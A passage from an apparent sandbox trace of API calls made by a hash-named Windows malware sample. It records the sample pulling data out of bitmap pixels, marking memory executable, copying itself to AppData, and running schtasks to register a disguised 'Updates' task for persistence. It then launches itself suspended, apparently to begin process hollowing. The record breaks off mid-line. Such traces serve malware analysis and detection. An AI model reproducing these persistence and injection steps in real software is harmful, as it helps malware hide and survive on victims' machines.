[0181.551] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=235, color=0x19e028) returned 0x0
[0181.551] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.551] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.551] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=236, color=0x19e028) returned 0x0
[0181.551] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.551] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.551] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=237, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.552] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.552] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=238, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.552] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.552] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=239, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.552] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.552] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=240, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.552] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.552] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=241, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.552] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.552] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=242, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.552] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.552] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=243, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.552] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.552] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=244, color=0x19e028) returned 0x0
[0181.552] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.553] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.553] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=245, color=0x19e028) returned 0x0
[0181.553] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.553] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.553] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=246, color=0x19e028) returned 0x0
[0181.553] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.553] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.553] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=247, color=0x19e028) returned 0x0
[0181.553] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=248, color=0x19e028) returned 0x0
[0182.022] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x68000, lpName=0x0) returned 0x364
[0182.023] memcpy (in: _Dst=0x7a20000, _Src=0x32577d8, _Size=0x68000 | out: _Dst=0x7a20000) returned 0x7a20000
[0182.027] CloseHandle (hObject=0x364) returned 1
[0182.852] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18c00, lpName=0x0) returned 0x380
[0182.853] memcpy (in: _Dst=0xa170000, _Src=0x32bf7f8, _Size=0x18c00 | out: _Dst=0xa170000) returned 0xa170000
[0182.854] CloseHandle (hObject=0x380) returned 1
[0183.683] VirtualProtect (in: lpAddress=0x7a20178, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.690] VirtualProtect (in: lpAddress=0x7a201a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.693] VirtualProtect (in: lpAddress=0x7a201c8, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.696] VirtualProtect (in: lpAddress=0x7a874fe, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.700] VirtualProtect (in: lpAddress=0x7a874f2, dwSize=0xb, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.703] VirtualProtect (in: lpAddress=0x7a20208, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.708] VirtualProtect (in: lpAddress=0x7a53050, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.733] VirtualProtect (in: lpAddress=0x7a53074, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.737] VirtualProtect (in: lpAddress=0x7a5307c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.740] VirtualProtect (in: lpAddress=0x7a53080, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.788] VirtualProtect (in: lpAddress=0x7a53088, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.791] VirtualProtect (in: lpAddress=0x7a5308c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.794] VirtualProtect (in: lpAddress=0x7a53090, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.797] VirtualProtect (in: lpAddress=0x7a53094, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.799] VirtualProtect (in: lpAddress=0x7a5309c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.801] VirtualProtect (in: lpAddress=0x7a530a0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.830] VirtualProtect (in: lpAddress=0x7a530a8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.832] VirtualProtect (in: lpAddress=0x7a530ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.841] VirtualProtect (in: lpAddress=0x7a530b0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.844] VirtualProtect (in: lpAddress=0x7a530b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.847] VirtualProtect (in: lpAddress=0x7a530bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.851] VirtualProtect (in: lpAddress=0x7a530c0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.855] VirtualProtect (in: lpAddress=0x7a530c8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.857] VirtualProtect (in: lpAddress=0x7a530cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.861] VirtualProtect (in: lpAddress=0x7a530d0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.864] VirtualProtect (in: lpAddress=0x7a530d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.867] VirtualProtect (in: lpAddress=0x7a530dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.871] VirtualProtect (in: lpAddress=0x7a530e0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.874] VirtualProtect (in: lpAddress=0x7a530e4, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.877] VirtualProtect (in: lpAddress=0x7a530ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.879] VirtualProtect (in: lpAddress=0x7a530f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.883] VirtualProtect (in: lpAddress=0x7a530f4, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.887] VirtualProtect (in: lpAddress=0x7a530fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0183.890] VirtualProtect (in: lpAddress=0x7a53100, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19ce5c | out: lpflOldProtect=0x19ce5c*=0x1) returned 0
[0184.361] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", nBufferLength=0x105, lpBuffer=0x19d14c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", lpFilePart=0x0) returned 0x62
[0184.366] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="AlkQUlEgEPdgdvFu") returned 0x0
[0184.378] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="AlkQUlEgEPdgdvFu") returned 0x380
[0199.405] CoTaskMemAlloc (cb=0x20c) returned 0x88afc8
[0199.406] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x88afc8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0
[0199.412] CoTaskMemFree (pv=0x88afc8)
[0199.413] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19d130, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25
[0199.445] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe", nBufferLength=0x105, lpBuffer=0x19d1c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe", lpFilePart=0x0) returned 0x36
[0199.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19d66c) returned 1
[0199.446] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ohnfntvbamkg.exe"), fInfoLevelId=0x0, lpFileInformation=0x19d6e8 | out: lpFileInformation=0x19d6e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0199.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d668) returned 1
[0199.452] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", nBufferLength=0x105, lpBuffer=0x19d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", lpFilePart=0x0) returned 0x62
[0199.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19d5f8) returned 1
[0199.453] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x390
[0199.454] GetFileType (hFile=0x390) returned 0x1
[0199.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5f4) returned 1
[0199.454] GetFileType (hFile=0x390) returned 0x1
[0199.454] GetFileSize (in: hFile=0x390, lpFileSizeHigh=0x19d6f4 | out: lpFileSizeHigh=0x19d6f4*=0x0) returned 0xabc00
[0199.460] ReadFile (in: hFile=0x390, lpBuffer=0x3304c98, nNumberOfBytesToRead=0xabc00, lpNumberOfBytesRead=0x19d6a0, lpOverlapped=0x0 | out: lpBuffer=0x3304c98*, lpNumberOfBytesRead=0x19d6a0*=0xabc00, lpOverlapped=0x0) returned 1
[0199.467] CloseHandle (hObject=0x390) returned 1
[0199.469] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe", nBufferLength=0x105, lpBuffer=0x19d0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe", lpFilePart=0x0) returned 0x36
[0199.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19d5e4) returned 1
[0199.469] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\ohnfNTVBamkg.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\ohnfntvbamkg.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x390
[0199.473] GetFileType (hFile=0x390) returned 0x1
[0199.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d5e0) returned 1
[0199.473] GetFileType (hFile=0x390) returned 0x1
[0199.473] WriteFile (in: hFile=0x390, lpBuffer=0x3304c98*, nNumberOfBytesToWrite=0xabc00, lpNumberOfBytesWritten=0x19d694, lpOverlapped=0x0 | out: lpBuffer=0x3304c98*, lpNumberOfBytesWritten=0x19d694*=0xabc00, lpOverlapped=0x0) returned 1
[0199.489] CloseHandle (hObject=0x390) returned 1
[0199.575] GetCurrentProcess () returned 0xffffffff
[0199.576] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19d638 | out: TokenHandle=0x19d638*=0x390) returned 1
[0199.580] GetCurrentProcess () returned 0xffffffff
[0199.580] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19d608 | out: TokenHandle=0x19d608*=0x384) returned 1
[0199.583] GetTokenInformation (in: TokenHandle=0x390, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19d63c | out: TokenInformation=0x0, ReturnLength=0x19d63c) returned 0
[0199.583] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x87e818
[0199.583] GetTokenInformation (in: TokenHandle=0x390, TokenInformationClass=0x1, TokenInformation=0x87e818, TokenInformationLength=0x24, ReturnLength=0x19d63c | out: TokenInformation=0x87e818, ReturnLength=0x19d63c) returned 1
[0199.585] LocalFree (hMem=0x87e818) returned 0x0
[0199.586] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19d558, DesiredAccess=0x800, PolicyHandle=0x19d518 | out: PolicyHandle=0x19d518) returned 0x0
[0199.590] LsaLookupSids (in: PolicyHandle=0x83e370, Count=0x1, Sids=0x22a3340*=0x22a32ac*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), ReferencedDomains=0x19d534, Names=0x19d528 | out: ReferencedDomains=0x19d534, Names=0x19d528) returned 0x0
[0199.593] LsaClose (ObjectHandle=0x83e370) returned 0x0
[0199.594] LsaFreeMemory (Buffer=0x85c088) returned 0x0
[0199.594] LsaFreeMemory (Buffer=0x880ef8) returned 0x0
[0199.596] CoTaskMemAlloc (cb=0x20c) returned 0x88afc8
[0199.596] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x88afc8 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25
[0199.597] CoTaskMemFree (pv=0x88afc8)
[0199.597] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19d134, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16
[0199.598] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19d148, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29
[0199.598] CoTaskMemAlloc (cb=0x20c) returned 0x88afc8
[0199.598] GetTempFileNameW (in: lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x88afc8 | out: lpTempFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp1326.tmp")) returned 0x1326
[0199.599] CoTaskMemFree (pv=0x88afc8)
[0199.605] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp", nBufferLength=0x105, lpBuffer=0x19cff8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp", lpFilePart=0x0) returned 0x34
[0199.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19d530) returned 1
[0199.605] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp1326.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x39c
[0199.605] GetFileType (hFile=0x39c) returned 0x1
[0199.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19d52c) returned 1
[0199.605] GetFileType (hFile=0x39c) returned 0x1
[0199.607] WriteFile (in: hFile=0x39c, lpBuffer=0x22acdec*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x19d5bc, lpOverlapped=0x0 | out: lpBuffer=0x22acdec*, lpNumberOfBytesWritten=0x19d5bc*=0x66e, lpOverlapped=0x0) returned 1
[0199.608] CloseHandle (hObject=0x39c) returned 1
[0199.628] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x881ac8
[0199.628] LocalAlloc (uFlags=0x0, uBytes=0xbe) returned 0x8ddaf8
[0199.630] ShellExecuteExW (in: pExecInfo=0x22ae154*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ohnfNTVBamkg\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x22ae154*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\ohnfNTVBamkg\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4c8)) returned 1
[0203.963] LocalFree (hMem=0x881ac8) returned 0x0
[0203.963] LocalFree (hMem=0x8ddaf8) returned 0x0
[0203.967] GetCurrentProcess () returned 0xffffffff
[0203.967] GetCurrentProcess () returned 0xffffffff
[0203.971] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19d620, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19d620*=0x458) returned 1
[0203.974] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19d618*=0x458, lpdwindex=0x19d434 | out: lpdwindex=0x19d434) returned 0x0
[0224.866] CloseHandle (hObject=0x458) returned 1
[0224.873] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp", nBufferLength=0x105, lpBuffer=0x19d158, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp", lpFilePart=0x0) returned 0x34
[0224.874] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp1326.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp1326.tmp")) returned 1
[0224.893] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", nBufferLength=0x105, lpBuffer=0x19d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", lpFilePart=0x0) returned 0x62
[0224.984] CreateProcessW (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19d36c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19d66c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x19d66c*(hProcess=0x378, hThread=0x458, dwProcessId=0x1074, dwThreadId=0x7c0)) returned 1
[0225.045] GetThreadContext (in: hThread=0x458, lpContext=0x22ae858 | out: lpContext=0x22ae858*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x2a4000, Edx=0x0, Ecx=0x0, Eax=0x477a92, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, 